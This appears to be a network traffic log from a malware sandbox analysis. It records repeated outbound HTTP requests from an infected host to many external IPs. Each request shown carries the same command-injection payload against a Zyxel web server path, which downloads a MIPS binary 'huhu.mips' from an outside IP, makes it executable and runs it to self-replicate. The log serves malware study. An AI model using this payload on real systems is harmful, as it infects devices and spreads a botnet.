                                      Jan 19, 2024 17:29:51.143853903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9015192.168.2.1457372109.43.128.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143872976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9016192.168.2.145673247.144.63.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143903971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9017192.168.2.145492241.198.103.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143937111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9018192.168.2.14520548.178.200.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143970013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9019192.168.2.1451662155.224.97.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.143996954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9020192.168.2.145163653.127.153.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144037008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9021192.168.2.144733459.188.47.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144068956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9022192.168.2.1438294183.130.211.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144112110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9023192.168.2.143521291.140.181.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144144058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9024192.168.2.145960858.80.72.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144175053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9025192.168.2.1455216189.12.23.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144211054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9026192.168.2.1436334190.147.105.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144257069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9027192.168.2.1456800102.135.0.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144284964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9028192.168.2.1435480133.124.3.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144313097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9029192.168.2.145580277.190.23.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144349098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9030192.168.2.145511241.100.71.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144392967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9031192.168.2.1437792113.64.172.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144429922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9032192.168.2.1446780164.114.90.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144452095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9033192.168.2.1435514101.170.137.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144476891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9034192.168.2.143437291.22.118.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144498110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9035192.168.2.1442452198.117.187.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144548893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9036192.168.2.143390468.161.170.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144566059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9037192.168.2.143295046.157.191.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144587994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9038192.168.2.1441044173.131.219.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144630909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9039192.168.2.1452096206.152.220.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144649982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9040192.168.2.144589483.204.216.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144701958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9041192.168.2.143748257.65.2.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144730091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9042192.168.2.1455036146.13.136.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144762993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9043192.168.2.1445078164.50.178.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144772053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9044192.168.2.144738071.111.111.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144824028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9045192.168.2.145076877.124.92.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144851923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9046192.168.2.1447500167.253.191.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144895077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9047192.168.2.1456814130.207.86.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144918919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9048192.168.2.14529384.20.177.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144977093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9049192.168.2.1449472124.86.29.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.144999981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9050192.168.2.1459468213.178.186.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145031929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9051192.168.2.1446496167.126.97.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145052910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9052192.168.2.1458776223.108.56.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145100117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9053192.168.2.1438444100.173.137.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145118952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9054192.168.2.14357545.53.69.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145169020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9055192.168.2.1437772102.114.251.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145205975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9056192.168.2.1460850207.0.135.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145243883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9057192.168.2.143441846.90.212.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145275116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9058192.168.2.1438562148.53.148.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145314932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9059192.168.2.1439344219.65.235.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145344973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9060192.168.2.1446340112.104.53.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145365953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9061192.168.2.144653864.26.154.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145411015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9062192.168.2.14341682.190.12.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145435095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9063192.168.2.144560270.111.97.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145468950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9064192.168.2.143894644.224.17.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145499945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9065192.168.2.1449008112.92.247.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145553112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9066192.168.2.144097818.33.151.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145586967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9067192.168.2.1435682169.160.60.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145615101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9068192.168.2.145600484.89.115.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145661116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9069192.168.2.1450658193.176.47.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145685911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9070192.168.2.1458642181.81.186.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145720959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9071192.168.2.1440850220.36.249.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145756006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9072192.168.2.14594348.2.168.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145772934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9073192.168.2.1458818175.218.23.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145814896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9074192.168.2.1451060155.97.87.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145848989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9075192.168.2.1454238115.223.224.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145895958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9076192.168.2.1458214131.165.220.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145921946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9077192.168.2.144454634.215.53.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.145960093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9078192.168.2.1441226176.39.209.1443
                                      TimestampBytes transferredDirectionData
